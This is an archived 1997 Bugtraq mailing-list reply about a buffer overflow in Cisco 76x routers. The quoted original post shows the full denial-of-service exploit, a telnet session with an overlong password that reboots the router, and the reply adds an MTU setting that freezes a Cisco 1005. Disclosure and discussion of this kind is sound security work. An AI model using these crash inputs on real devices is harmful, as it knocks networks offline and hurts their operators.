Bugtraq mailing list archives
Re: cisco 76x buffer overflow
From: ralf () UNI-KOBLENZ DE (ralf () UNI-KOBLENZ DE)
Date: Thu, 11 Dec 1997 09:19:09 +0100
On Thu, Dec 11, 1997 at 01:11:13AM -0500, Laslo Orto wrote:
I dont know of anybody ever posting anything on this sbuject, so i'll go ahed. I found a buffer overflow in the cisco 76x series router. The bug exists only in the 4 users limit software, i couldnt reproduce it with the unlimited version. When i reported the bug to cisco i promised them that i'll post this info to public if they dont fix it withing a week. It was over a month ago, and i was never notified of any fix so i'm asuming they didnt make any fix. I also cant find any mentioning of this bug on their web site by searching for the bug id. The exploit is prety simple: telnet cisco762.domain.com Trying 1.2.3.4... Connected to 1.2.3.4. Escape character is '^]'. Enter Password:Enter a veryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy yyyyyyyyyyyyyyyyyyyyyyyyyyyy long string here and watch the prety lights go on as the cisco reboots, or imagine your victim tearing his hair out.
IOS has proably a pound more of them. While not exploitable from outside I can crash my CISCO 1005 running IOS 10.3(8) by setting the MTU to 15kb. A couple of seconds later the box will freeze. Just to show how tested the thing is ... IOS is probably not as badly affected as other operating systems because few people outside of CISCO have the required knowledge about the OS internals, so writing a useable exploit is hard. Ralf
Current thread:
- cisco 76x buffer overflow Laslo Orto (Dec 10)
- Re: cisco 76x buffer overflow ralf () UNI-KOBLENZ DE (Dec 11)
- Re: cisco 76x buffer overflow John Bashinski (Dec 11)